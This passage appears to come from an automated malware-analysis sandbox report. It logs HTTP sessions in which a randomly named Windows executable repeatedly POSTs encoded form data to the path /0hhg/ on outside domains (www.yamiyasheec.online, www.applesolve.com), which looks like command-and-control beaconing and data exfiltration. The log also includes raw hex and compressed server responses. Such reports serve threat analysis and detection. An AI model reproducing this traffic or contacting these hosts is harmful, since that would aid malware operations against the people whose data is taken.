                                                                                                    May 2, 2024 08:26:14.557853937 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 34 35 31 35 2c 2d 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 30 22 0a
                                                                                                    Data Ascii: transform="translate(-170.14515,-0.038164)" id="path4610" d="m 318,180.45184 c 0.66667,0 1.33434,0 1.501,0.16616 0.16667,0.16617 -0.16667,0.49951 0.001,0.66667 0.16767,0.16717 0.68771,0.16717 0.89053,0.3694


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    21192.168.2.449758119.18.54.11680916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:26:20.710155964 CEST717OUTPOST /0hhg/ HTTP/1.1
                                                                                                    Host: www.yamiyasheec.online
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.yamiyasheec.online
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 205
                                                                                                    Referer: http://www.yamiyasheec.online/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Raw: 41 42 71 44 57 36 41 38 3d 61 50 58 4f 4f 4e 4b 6e 72 2f 36 55 73 64 45 53 37 53 41 74 68 47 59 4d 35 71 51 6d 53 33 34 31 67 79 49 77 72 4b 6f 72 31 35 4b 2f 32 71 38 42 41 47 52 2f 43 45 35 41 46 35 30 49 49 4e 43 35 6e 6e 4d 4e 77 77 41 45 58 34 41 38 71 6c 74 6d 45 4d 48 43 30 59 65 2b 64 56 63 45 6f 34 79 66 77 78 51 47 52 33 6c 33 70 78 77 75 6a 65 47 71 4f 52 69 53 36 4f 76 2b 2f 73 37 6a 4f 33 31 6e 75 4b 64 47 50 64 30 53 77 55 65 2b 54 59 37 65 2f 66 69 6a 52 69 2b 4f 57 5a 69 4e 73 4d 4c 2f 41 4e 37 47 75 50 66 4d 41 6c 4b 79 44 49 4b 70 4c 36 6d 54 30 6f 76 76 59 43 59 65 78 72 54 45 69 41 3d 3d
                                                                                                    Data Ascii: ABqDW6A8=aPXOONKnr/6UsdES7SAthGYM5qQmS341gyIwrKor15K/2q8BAGR/CE5AF50IINC5nnMNwwAEX4A8qltmEMHC0Ye+dVcEo4yfwxQGR3l3pxwujeGqORiS6Ov+/s7jO31nuKdGPd0SwUe+TY7e/fijRi+OWZiNsML/AN7GuPfMAlKyDIKpL6mT0ovvYCYexrTEiA==
                                                                                                    May 2, 2024 08:26:21.114871979 CEST176INHTTP/1.1 200 OK
                                                                                                    Date: Thu, 02 May 2024 06:26:20 GMT
                                                                                                    Server: Apache
                                                                                                    Upgrade: h2,h2c
                                                                                                    Connection: Upgrade, close
                                                                                                    Content-Length: 0
                                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    22192.168.2.449759119.18.54.11680916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:26:24.024579048 CEST737OUTPOST /0hhg/ HTTP/1.1
                                                                                                    Host: www.yamiyasheec.online
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.yamiyasheec.online
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 225
                                                                                                    Referer: http://www.yamiyasheec.online/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Raw: 41 42 71 44 57 36 41 38 3d 61 50 58 4f 4f 4e 4b 6e 72 2f 36 55 74 38 55 53 39 31 30 74 77 6d 59 50 36 71 51 6d 59 58 34 78 67 79 45 77 72 4f 34 42 31 4c 75 2f 32 49 6b 42 52 33 52 2f 42 45 35 41 4f 5a 31 44 51 74 43 45 6e 6e 49 46 77 77 4d 45 58 34 55 38 71 6e 6c 6d 48 38 37 42 33 6f 65 72 55 31 63 43 31 6f 79 66 77 78 51 47 52 30 59 73 70 78 6f 75 6a 75 57 71 50 31 32 64 32 75 76 39 32 4d 37 6a 4b 33 31 6a 75 4b 64 67 50 59 63 34 77 58 71 2b 54 64 66 65 2f 4b 57 69 45 53 2b 4d 53 5a 6a 73 39 38 58 33 4e 49 4b 34 6c 4d 6e 71 50 6c 36 42 50 75 62 7a 61 4c 48 45 6d 6f 4c 63 46 46 52 71 38 6f 75 4e 35 42 4f 75 48 44 5a 77 52 4e 56 65 64 55 30 4e 53 72 7a 75 6e 59 30 3d
                                                                                                    Data Ascii: ABqDW6A8=aPXOONKnr/6Ut8US910twmYP6qQmYX4xgyEwrO4B1Lu/2IkBR3R/BE5AOZ1DQtCEnnIFwwMEX4U8qnlmH87B3oerU1cC1oyfwxQGR0YspxoujuWqP12d2uv92M7jK31juKdgPYc4wXq+Tdfe/KWiES+MSZjs98X3NIK4lMnqPl6BPubzaLHEmoLcFFRq8ouN5BOuHDZwRNVedU0NSrzunY0=
                                                                                                    May 2, 2024 08:26:24.428209066 CEST176INHTTP/1.1 200 OK
                                                                                                    Date: Thu, 02 May 2024 06:26:24 GMT
                                                                                                    Server: Apache
                                                                                                    Upgrade: h2,h2c
                                                                                                    Connection: Upgrade, close
                                                                                                    Content-Length: 0
                                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    23192.168.2.449760119.18.54.11680916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:26:27.604631901 CEST10819OUTPOST /0hhg/ HTTP/1.1
                                                                                                    Host: www.yamiyasheec.online
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.yamiyasheec.online
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 10305
                                                                                                    Referer: http://www.yamiyasheec.online/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Raw: 41 42 71 44 57 36 41 38 3d 61 50 58 4f 4f 4e 4b 6e 72 2f 36 55 74 38 55 53 39 31 30 74 77 6d 59 50 36 71 51 6d 59 58 34 78 67 79 45 77 72 4f 34 42 31 4c 6d 2f 31 37 73 42 41 67 4e 2f 41 45 35 41 44 35 31 41 51 74 43 56 6e 6e 77 37 77 78 77 36 58 36 73 38 72 46 64 6d 43 4f 66 42 73 34 65 72 57 31 63 48 6f 34 79 4f 77 31 31 50 52 33 67 73 70 78 6f 75 6a 6f 53 71 4a 68 69 64 30 75 76 2b 2f 73 37 5a 4f 33 31 66 75 4b 46 65 50 59 59 43 77 42 61 2b 53 39 50 65 35 34 2b 69 59 43 2b 4b 65 35 6a 4f 39 38 61 70 4e 4a 6a 4a 6c 4e 54 51 50 6d 6d 42 4d 61 43 75 4f 2f 33 2f 6b 4c 4c 54 64 30 31 50 33 5a 36 77 2b 42 2b 4b 4a 79 63 6c 45 4e 46 4f 61 6b 52 78 4a 4b 6a 4c 38 38 7a 62 72 47 56 66 2f 39 67 59 75 62 72 32 37 2b 31 77 37 58 61 54 34 51 6d 53 6d 36 62 2b 6e 54 6e 63 6f 67 45 5a 4b 52 4d 35 77 48 4c 72 66 5a 49 32 45 4c 38 74 33 69 31 4a 4c 52 34 4f 50 30 51 55 55 77 2f 6a 72 4e 53 6a 64 50 4c 45 33 66 75 6a 4a 6d 75 71 34 42 4c 53 6f 45 50 64 79 41 66 4f 6d 73 73 41 6c 66 75 78 65 68 35 67 51 4f 45 45 74 [TRUNCATED]
                                                                                                    Data Ascii: ABqDW6A8=aPXOONKnr/6Ut8US910twmYP6qQmYX4xgyEwrO4B1Lm/17sBAgN/AE5AD51AQtCVnnw7wxw6X6s8rFdmCOfBs4erW1cHo4yOw11PR3gspxoujoSqJhid0uv+/s7ZO31fuKFePYYCwBa+S9Pe54+iYC+Ke5jO98apNJjJlNTQPmmBMaCuO/3/kLLTd01P3Z6w+B+KJyclENFOakRxJKjL88zbrGVf/9gYubr27+1w7XaT4QmSm6b+nTncogEZKRM5wHLrfZI2EL8t3i1JLR4OP0QUUw/jrNSjdPLE3fujJmuq4BLSoEPdyAfOmssAlfuxeh5gQOEEtfntcKoZdwKRqknD+K0SAsR/H0UP3WK6shco1IcTHTk1V6KJ9pUy0TJ1e30xFpxbZMvojvKSeRXWwteLxLyy8IXpZc8zCmd/8yMpd9Wz3qGHcpcsoBerNYuzvtNPDlAqRo8946zhYMuxzS66duLUWk/dl2uP24q0cB/zCppXzOx4ZK9fSjKkrvH77M0RS0c1oy57wNFjLqafV9BqX8Qe1Qz/mJNhL70F13T14xZInwd6rqfR5Maf+ftvcu3gnK6Rzhgrl9MdaFz5qEf4xZitKW/TeuqPuw4MfXwML1yY9W2fjgKMapjLCl04fFfnj5noJ75gN2FYPylfCmm/pazpmOR7P9/nh+ibuq9QzdxxdFKAve68KtdEGOfgnlgxzb1EkLSazWaezDNxY1S5yfiC1TBK48B/UvqlueLR1H8Odt/F/zuvtRlwQJu1sJjV2A55sEioGoYwxKFaAFMi/5sU9MkQ0DmL0Zlh9XPpKogtk8SUh8S9ZT+XOy9rmJVU9l5cwvNCdesBcLbH+XH2r3NX72yZXsdXQSwKdV7ocsyYcpzK5U70M4uWjN8pXA/Yj7B++qHPw18AqtA/93YRSCbn8N/ri0AzHHVnBCyZMUoc1OcpCxMhsw2xxq515sgOdu+GebrYAPYVU9rCaowhOnfI5iHBXg4vb4GP3MV [TRUNCATED]
                                                                                                    May 2, 2024 08:26:28.011447906 CEST176INHTTP/1.1 200 OK
                                                                                                    Date: Thu, 02 May 2024 06:26:27 GMT
                                                                                                    Server: Apache
                                                                                                    Upgrade: h2,h2c
                                                                                                    Connection: Upgrade, close
                                                                                                    Content-Length: 0
                                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    24192.168.2.449761119.18.54.11680916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:26:30.653178930 CEST442OUTGET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=XN/uN6nMvrGkpcBz+Thv1jYaxJtcZ3guzCEwk+wO1IePrLEfQ2dONhxJJ5MfI8SrhyY28ykjUI4nvFFhDsPQuo7fansGo7O9hSpOWy12njMGsYSDFVmwrLg= HTTP/1.1
                                                                                                    Host: www.yamiyasheec.online
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    May 2, 2024 08:26:31.056354046 CEST176INHTTP/1.1 200 OK
                                                                                                    Date: Thu, 02 May 2024 06:26:30 GMT
                                                                                                    Server: Apache
                                                                                                    Upgrade: h2,h2c
                                                                                                    Connection: Upgrade, close
                                                                                                    Content-Length: 0
                                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    25192.168.2.449762188.116.38.15580916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:26:36.839521885 CEST705OUTPOST /0hhg/ HTTP/1.1
                                                                                                    Host: www.applesolve.com
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.applesolve.com
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 205
                                                                                                    Referer: http://www.applesolve.com/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Raw: 41 42 71 44 57 36 41 38 3d 69 6d 74 51 61 45 4e 38 64 4a 7a 2f 67 48 53 79 6c 55 77 50 4f 32 65 64 59 49 52 48 73 49 6e 4f 53 35 44 30 79 38 54 63 53 6b 4e 53 45 53 45 50 52 36 30 31 6c 33 45 63 52 4c 4c 67 74 61 32 38 7a 49 71 48 47 54 36 6e 75 39 68 45 65 37 4d 52 59 34 6c 67 57 65 69 63 72 4c 6e 54 57 48 56 48 6c 2b 45 44 33 2f 57 51 6e 49 62 2f 45 2b 69 31 78 30 7a 35 46 55 54 5a 67 38 6c 34 56 66 4d 45 43 42 48 6c 6d 45 2f 73 6c 52 4a 51 63 43 6a 69 7a 74 38 41 54 73 65 44 73 41 42 64 62 63 76 7a 34 6f 51 38 6b 35 75 6d 4e 72 4b 72 6d 7a 79 2b 6e 52 6d 38 6d 46 75 46 53 76 65 6f 65 41 39 2b 57 77 3d 3d
                                                                                                    Data Ascii: ABqDW6A8=imtQaEN8dJz/gHSylUwPO2edYIRHsInOS5D0y8TcSkNSESEPR601l3EcRLLgta28zIqHGT6nu9hEe7MRY4lgWeicrLnTWHVHl+ED3/WQnIb/E+i1x0z5FUTZg8l4VfMECBHlmE/slRJQcCjizt8ATseDsABdbcvz4oQ8k5umNrKrmzy+nRm8mFuFSveoeA9+Ww==
                                                                                                    May 2, 2024 08:26:37.571536064 CEST1289INHTTP/1.1 404 Not Found
                                                                                                    Connection: close
                                                                                                    x-powered-by: PHP/8.3.6
                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                    link: <https://applesolve.com/wp-json/>; rel="https://api.w.org/"
                                                                                                    transfer-encoding: chunked
                                                                                                    content-encoding: br
                                                                                                    vary: Accept-Encoding
                                                                                                    date: Thu, 02 May 2024 06:26:36 GMT
                                                                                                    server: LiteSpeed
                                                                                                    Data Raw: 35 34 36 33 0d 0a f4 c2 1b a2 a8 aa fd 70 45 24 e9 ac 1e 02 1a 29 0b e7 ef 2f 02 e3 26 3e d6 79 be ff cc d4 fa f3 a4 6a 0e 77 04 9e 96 c9 04 80 48 6a b1 4d 8d dc 59 3d bd 64 ab 38 99 cd f2 a8 1e c9 47 0a 36 08 a0 01 50 a4 cc f0 6f e7 fb ff 5f 55 fb be 26 cf 71 d1 df a5 27 58 b3 00 84 48 80 b2 ad 17 bc 33 9b 66 5e f2 86 ac 03 82 20 85 31 49 f0 11 54 f0 d3 fa a7 aa da a2 ff 45 97 fe 7f df d4 ec c9 8d a9 f2 e9 5d a5 dc d1 58 12 dc 14 3a 87 98 ee bd ef 15 7f e6 4f 31 00 58 0c 08 16 00 c8 02 24 55 20 6c 60 ba ef de f7 de ff f3 67 06 44 92 16 04 15 98 56 4b 6e 24 a8 44 4a 4b 39 90 82 ce b1 a8 4d 92 9c 72 97 ca 90 29 6d c8 b6 2c e7 dc 74 1f 74 82 43 08 e5 1e 57 3a 2e 9a ca 8f f1 b3 cf ed ee 47 ce 40 44 40 50 5f 6d 19 9a d6 4b f7 8f 69 83 2c 04 08 d0 82 a4 8f a1 e5 7f bb 2f ed 4e 14 70 e1 88 20 de 3d 86 6a fb f7 6e 04 44 8d d4 e0 23 cb 50 b5 e9 d9 eb 5b 63 10 20 8e c5 b5 00 c5 c7 08 70 ae af 60 53 68 d5 e9 ab 9e 7c 4b ad e2 5f 3e d0 6b 4a ce 6f 31 5c 26 ff 45 1e c3 96 ee fb dd c6 4d d0 d0 e2 96 32 4b 8e a2 [TRUNCATED]
                                                                                                    Data Ascii: 5463pE$)/&>yjwHjMY=d8G6Po_U&q'XH3f^ 1ITE]X:O1X$U l`gDVKn$DJK9Mr)m,ttCW:.G@D@P_mKi,/Np =jnD#P[c p`Sh|K_>kJo1\&EM2Kc-z#;zE})?*CZ*>6f>zdPx}@Dd|? O>I.4*5As*3y-4w>J:'gXu^i/~(sr9XuDQ6_aN 7Q#G}{Ay"ZI2{yX)'dG:X]7p[ln<S4g%w^a7/nD"E6\d9e@sz/F>o[2+#-.!d2C`yo| dsh#ZDFilA`+b?0L13H1Sl7Z7<x>Q<m<z/Ac5`O'u#SxiBY`:Qv|2DKP6vE-CKXo*|:,)B
                                                                                                    May 2, 2024 08:26:37.571630955 CEST1289INData Raw: 60 f8 b5 85 06 df 41 00 f0 6f a4 44 05 01 62 e6 b6 11 5e ab f5 8a 60 18 d9 7e 66 4a 10 cf dc 80 bb 59 d0 00 b2 d0 ef 9d 0f c1 ed 76 eb ee c2 fd 14 13 f9 7e dd 1d f3 bd 0c e5 21 0a f1 58 82 47 5a 2b 68 68 9e f9 db 43 47 c8 e8 ae ab 2e 17 e5 ae ab
                                                                                                    Data Ascii: `AoDb^`~fJYv~!XGZ+hhCG.zjL]%I5\G~s'Z(~uuULv]U/j]DgB^uF.jot6 nlkiA[\O}GvcEo?{D7eP8yT
                                                                                                    May 2, 2024 08:26:37.571737051 CEST1289INData Raw: a5 4f c1 4d e3 c8 55 c2 07 17 6a fc 00 83 67 60 6f 94 d4 8f 1f a1 bc 0d fa 3d 7f 63 74 60 b7 d8 18 24 df 7f 65 5f 4d 61 82 61 9f 87 53 83 9a df 82 f6 ec 7b d1 e9 d0 b1 b7 a0 03 38 54 8a fd 82 ea 88 41 96 40 3e 61 87 03 94 ca ae 24 fb 97 49 72 43
                                                                                                    Data Ascii: OMUjg`o=ct`$e_MaaS{8TA@>a$IrCbXv#gr]R^ao&&zL@"L8arH!3vX|vX~KvX}+vX]3e@sX[~JiTbS`r*up*yy&jqt67SeJ2qR4K
                                                                                                    May 2, 2024 08:26:37.571753025 CEST1289INData Raw: 44 a9 14 21 c1 c5 9a 01 0e 87 09 a6 69 0a 3a 83 97 01 89 f0 8f d2 52 42 4c 62 9b 60 27 65 1a a9 4d 17 7a 22 bf a4 a8 0e c5 30 d3 76 39 7e 52 1a 4a 1a 8c 34 72 8e ed 41 fa 96 d9 28 09 1f 9d 97 d1 e4 3c 78 80 e8 4b fe dc 2d 8d c2 8a 07 c3 7d af 89
                                                                                                    Data Ascii: D!i:RBLb`'eMz"0v9~RJ4rA(<xK-}R tx*w(Io=?%;+D)?~ODsW&&J4K K^Rw~G8:U'^|kCl7c\M|4;H-y.L'pr]|M
                                                                                                    May 2, 2024 08:26:37.572010994 CEST1289INData Raw: 10 df 98 c9 cc 91 b5 1d 48 1a 89 ee 5d 0e e7 39 61 45 1a 59 a6 5c f6 2a 93 2f 83 83 cd e6 31 85 3b 54 45 97 47 12 0d 5a 35 e3 26 c6 c9 3b c6 ab 59 c8 79 d3 b4 50 bd 5a 8e 79 b7 92 ab a9 47 dd dc 6c a6 3c f7 2b 0f 77 30 aa 5a 14 00 ae 14 3a 88 20
                                                                                                    Data Ascii: H]9aEY\*/1;TEGZ5&;YyPZyGl<+w0Z: ^7S``lGc;Rqex<{qMl^>t<Z=R79Jv}TQ+Z+yN)O9$5f`ura:z~yRYb_8?[W<2GB^+
                                                                                                    May 2, 2024 08:26:37.572062016 CEST1289INData Raw: 58 f1 8b 37 02 2f 9f 90 fb 96 25 7e 4a 0c fe 29 d1 56 4f 09 d5 3c 29 83 32 2c 06 17 63 c5 ab 01 61 b6 45 b2 7a ef 72 05 29 3d f4 80 d8 1a a5 b2 78 3a 8d 89 c8 bf 80 7c cb 04 84 a7 da e0 9f 6a 6d f5 54 53 cd 53 6c 50 42 4d 76 bd d4 05 54 dd bb cc
                                                                                                    Data Ascii: X7/%~J)VO<)2,caEzr)=x:|jmTSSlPBMvTHJMK#Jyv<^@\B8/}8F*:Z-k]|Di) /1Cz|i51/ec.JX}5"!1"b.b!Mq.`\rNkc0F.C
                                                                                                    May 2, 2024 08:26:37.572170973 CEST1289INData Raw: c6 b5 39 71 26 40 c0 88 a4 97 49 85 0d 89 f5 59 1b c8 da 71 16 7d 04 aa 24 6c 98 63 5c d5 43 d2 54 d5 fe d2 e1 0b a3 2a aa c9 54 a2 7b b9 29 d2 05 36 37 50 2b ce 4e ae cb 2f 03 82 2e 60 de 0d 4e 05 d8 e5 a8 b0 fe b2 15 75 b5 99 1c e0 b5 0a 61 b1
                                                                                                    Data Ascii: 9q&@IYq}$lc\CT*T{)67P+N/.`NuaZ@1`,$#j:PemAnn#]'2F68G(!nZMZL/CK=_ %{0J0q>iXDvjU-U;7~f|0o>Sh|-z!>D
                                                                                                    May 2, 2024 08:26:37.572230101 CEST1289INData Raw: 36 a7 33 85 a4 e4 1b f2 c4 66 68 6a 44 5a 48 b2 d6 62 2b 54 60 68 30 29 82 7e c3 8a 0b 3a 65 50 32 95 43 2c 87 6f a1 73 38 b2 c0 b3 ab 05 e4 9a 26 f6 b5 12 9c 5b 30 ca b2 04 86 fd 18 70 bb 52 12 dc c1 e8 a4 26 ea d9 ef cd 44 44 91 b5 10 1f 3b 8a
                                                                                                    Data Ascii: 63fhjDZHb+T`h0)~:eP2C,os8&[0pR&DD;@xA)THZkaKlhkJF!aG1 1:QM-U1{@:qRSzDr:geqR3zDE:K.`]6r."rW0.;^gK@n]FE:K`Z
                                                                                                    May 2, 2024 08:26:37.572256088 CEST1289INData Raw: 0c 4d 52 2f db c2 81 d3 7b 71 39 12 a7 65 00 2c 03 81 86 3e f8 c0 38 b5 fc c9 a6 10 72 38 67 d5 46 dc 90 cd 78 6e b4 3a 31 71 a2 e2 a2 0c 45 22 95 f3 60 5f f6 59 99 e8 24 3f a0 b2 e8 b8 19 83 35 fe 5c a5 81 69 a6 d0 ab 70 76 8c e5 9b 48 8c 1e fa
                                                                                                    Data Ascii: MR/{q9e,>8r8gFxn:1qE"`_Y$?5\ipvHh)Z=kV``"787>S$dgkfG'r5P5@9][^>S?ldl@v"T_YO?x^ a~0P>5[zs5^@8n?|#,^
                                                                                                    May 2, 2024 08:26:37.572276115 CEST1289INData Raw: 5e 48 13 49 de c6 40 e4 94 51 5a 8e ee 32 90 59 a5 0f 03 11 ef 08 27 2a 83 64 3a 54 f0 7d 53 0e a8 af 40 69 97 57 4b 66 46 0f b7 59 26 3b 1b 32 71 9d 6d b9 a1 c3 b6 86 60 f7 eb 60 46 24 70 11 34 d4 88 6c 73 20 cb 35 b0 46 a9 34 34 f1 67 0a ad b4
                                                                                                    Data Ascii: ^HI@QZ2Y'*d:T}S@iWKfFY&;2qm``F$p4ls 5F44g{0J&]I}+.6%<C"Evs3"JA(Q>cLV?Vw=}J*6Ji_Zn3t k 2Prr|hoX<7tqg6$uz"+,9RGa\R\"g
                                                                                                    May 2, 2024 08:26:37.759387970 CEST1289INData Raw: 02 e3 75 ff 64 e7 01 a7 c9 bb 65 3e 0c 48 4f a6 25 e2 42 22 ce 13 fe cd 60 8a 21 c6 29 e2 b4 5a 01 8f 85 dd 38 62 a6 5c 81 3c bf 55 18 24 65 16 49 cb f7 ba 62 31 f8 ce 95 59 81 39 6d 4a 22 2e 0d d2 9f b7 d5 fd 21 ed 3f 07 16 1b 48 ae e3 73 5a 22
                                                                                                    Data Ascii: ude>HO%B"`!)Z8b\<U$eIb1Y9mJ".!?HsZ".8b".)Fh]{8c{q+\I$jk9`~$'*db~JAhesH,3gQS9C~C986P<LeD_<5]x/Ic%*d4_


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    26192.168.2.449763188.116.38.15580916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:26:39.551518917 CEST725OUTPOST /0hhg/ HTTP/1.1
                                                                                                    Host: www.applesolve.com
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.applesolve.com
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 225
                                                                                                    Referer: http://www.applesolve.com/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Raw: 41 42 71 44 57 36 41 38 3d 69 6d 74 51 61 45 4e 38 64 4a 7a 2f 67 6b 61 79 6f 53 34 50 47 32 65 65 64 49 52 48 31 59 6e 4b 53 35 66 30 79 2b 2b 62 54 58 70 53 45 33 6f 50 51 34 4d 31 6b 33 45 63 49 37 4c 6c 67 36 32 33 7a 49 57 6c 47 53 57 6e 75 38 46 45 65 35 55 52 59 4a 6c 2f 56 75 69 43 74 4c 6e 43 53 48 56 48 6c 2b 45 44 33 2b 6e 46 6e 4c 72 2f 45 74 36 31 78 57 58 6d 50 30 54 65 77 73 6c 34 48 76 4d 2b 43 42 48 4c 6d 41 2f 53 6c 54 42 51 63 44 54 69 7a 34 63 66 5a 73 65 4e 6a 67 41 42 59 50 58 34 34 37 64 43 36 72 2b 53 4e 6f 4b 63 6a 31 6a 6b 32 67 48 72 30 46 4b 32 50 6f 58 63 54 44 41 33 4e 2b 4a 54 42 74 75 33 39 57 4f 62 79 64 71 51 50 6a 35 63 53 4a 30 3d
                                                                                                    Data Ascii: ABqDW6A8=imtQaEN8dJz/gkayoS4PG2eedIRH1YnKS5f0y++bTXpSE3oPQ4M1k3EcI7Llg623zIWlGSWnu8FEe5URYJl/VuiCtLnCSHVHl+ED3+nFnLr/Et61xWXmP0Tewsl4HvM+CBHLmA/SlTBQcDTiz4cfZseNjgABYPX447dC6r+SNoKcj1jk2gHr0FK2PoXcTDA3N+JTBtu39WObydqQPj5cSJ0=
                                                                                                    May 2, 2024 08:26:40.109965086 CEST1289INHTTP/1.1 404 Not Found
                                                                                                    Connection: close
                                                                                                    x-powered-by: PHP/8.3.6
                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                    link: <https://applesolve.com/wp-json/>; rel="https://api.w.org/"
                                                                                                    transfer-encoding: chunked
                                                                                                    content-encoding: br
                                                                                                    vary: Accept-Encoding
                                                                                                    date: Thu, 02 May 2024 06:26:38 GMT
                                                                                                    server: LiteSpeed
